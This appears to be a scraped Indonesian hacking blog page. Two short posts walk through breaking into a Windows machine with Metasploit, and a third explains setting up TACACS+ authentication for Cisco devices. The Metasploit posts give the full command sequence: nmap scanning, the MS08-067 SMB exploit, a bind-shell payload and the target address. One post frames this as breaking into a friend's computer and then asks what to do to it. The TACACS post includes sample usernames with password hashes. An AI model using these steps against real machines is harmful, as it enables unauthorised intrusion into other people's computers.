metasploit versi 2

saya mau melakuakn inject terhadap komp teman saya melalui vncinject yang ada pada exploit... pertama yang hrus kita lakukan mengecek port apa saja yang terbuka dengan melakukan nmap -sS -O [ip target] setelah muncul saya akan masuk melalu port 135/tcp kemudian saya masuk ke metasploit dengan mengetikan msfconsole setelah itu saya mulai beraksi dengan mengetikan use exploit/windows/smb/ms08_067_netapi lalu kita liat ada perintah apa saja dengan mengetikan show payloads kemudian kita set payload sesuai dengan apa yang anda inginkan klo saya inginnya menggukan set payload windows/shell/bind_tcp setelah itu kita liat perintah apa saja yang belum ada/belum kita seting... setelah keluar kita masukan RHOST ( ip si target ) dengan perintah set RHOST 192.168.16 (terserah) oce sudah selesai mari kita test... dengan mengetikan exploit tada... kita berhasil masuk deh... enaknya kita apain yah???!!! ref : http://www.hacker-cisadane.org nobita_chupuy Hacker Cisadane

Read More

metasploit versi 1

pertama tama kita melakukan scan network dulu dengan perintah nmap -sS -O [ip target] lalu setelah itu kita masuk ke metasploit dengan mengetikan msfconsole setelah muncul langsung saja kita lalukan tahap pertama dengan mengetikan perintah sebagai berikut... use exploit/windows/smb/ms08_067_netapi show payloads set payload windows/shell/bind/tcp set RHOST [ip target] exploit selesai dah dan apakah yang akan terjadi.... tada.... kita berhasil masuk kedalam sistem target dan ini tidak selalu berhasil tergantung dari port yang kita masuki itu bisa diinjeck atau tidak.. sekian.... nobita_chupuy Hacker Cisadane ref : http://hacker-cisadane.org

Read More

CISCO Simple User Radius Authentification

Pendahuluan TACACS adalah suatu program yang berfungsi untuk authentifikasi multiuser / radius server dalam pengaksesan suatu perangkat. Dan perangkat yang paling sering digunakan adalah CISCO. Kelebihan dari software ini yaitu suatu perangkat ( router / switch ) bisa diakses dengan menggunakan username yang berbeda tanpa adanya tambahan config yang memberatkan di perangkat, atau dengan kata lain TACACS mempunyai table username yang berbeda dengan policy penerapan akses yang berbeda tiap-tiap usernya tanpa memperhatikan level user yang ada. Selain itu kelebihan dengan centralize TACACS disamping setiap ada perubahan password cukup dengan update db di TACACS nya, program ini juga menawarkan fitur logging tiap-tiap user setiap kali user tersebut OL dan semua aktifitas akan di rekap dan easy to import tentunya. I.Instalasi TACACS on Ubuntu Server a.Install Ubuntu ( 6.10 ) b.Install tac_plus c.Konfigure file tacac.conf untuk pengaturan previledge, group, akses user. d.Reboot tacacs

II.List file di TACACS Server /var/log/tac-plus/account.log (log user login + aktifitas user) /var/tmp/tac_plus.log (service logfile) /etc/init.d/tac-plus (startup script) /etc/tac-plus/tacacs.conf (users and global settings) /usr/sbin/tac_plus (executable) III.Config di CISCO aaa new-model ! ! aaa authentication login default group tacacs+ local aaa authentication enable default group tacacs+ enable aaa authorization commands 1 default group tacacs+ none aaa authorization commands 15 default group tacacs+ none aaa accounting exec default start-stop group tacacs+ aaa accounting commands 1 default start-stop group tacacs+ aaa accounting commands 15 default start-stop group tacacs+ aaa accounting network default start-stop group tacacs+ aaa accounting connection default start-stop group tacacs+ aaa accounting system default start-stop group tacacs+ username xxx password xxx tacacs-server host xxx.xxx.xxx line con 0 exec-timeout 0 0 line vty 0 4 exec-timeout 0 0 nb : bold  supaya device bisa tetap diconfigure ketika TACACS offline IV.Cara Add User Add User & Password #htpasswd –d /etc/tac-plus/login test Masukkan password sesuai keinginan anda Buka file password tersebut untuk mengetahui encripsi password anda yang nantinya akan di copy ke tacacs.conf #ee /etc/tac-plus/login Copykan encrisi passwordnya yang terletak di sebelah user ke dalam tacacs.conf noc:5Ie.2NfO/wu4Y -> yang dicopy reza:FUXeXAXvc08XU Edit di tacacs.confnya #ee /etc/tac-plus/tacacs.conf Kemudian masukkan config ini kedalamnya user = test { -> sesuai dengan user yang diadd member = noc login = des {password}  pastekan passwordnya } Restart service TACACnya # /etc/init.d/tac-plus restart V.Cara Mofify User Untuk modify tidak bisa langsung change jadi harus didelet dulu di file /etc/tac-plus/login dengan perintah # htpasswd –D /etc/tac-plus/login test Kemudian add lagi terus paste lagi seperti step diatas. 1.Reporting Log di TACACS a.Setiap akhir bulan log accounting ( user login ) didownload dengan menggunakan SSH Secure File Transfer Client. Dengan sebelumnya mencopynya ke folder home agar bias diakses : # cp /var/log/tac-plus/account /home/biznet/ Kemudian buka SSH Secure File Transfer Client Tinggal klik kanan copy b.Open file tersebut dengan Microsoft Excel c.Rapikan  referensi : ilmukomputer.com Referensi http://www.debianhelp.co.uk/tacacs.htm

Read More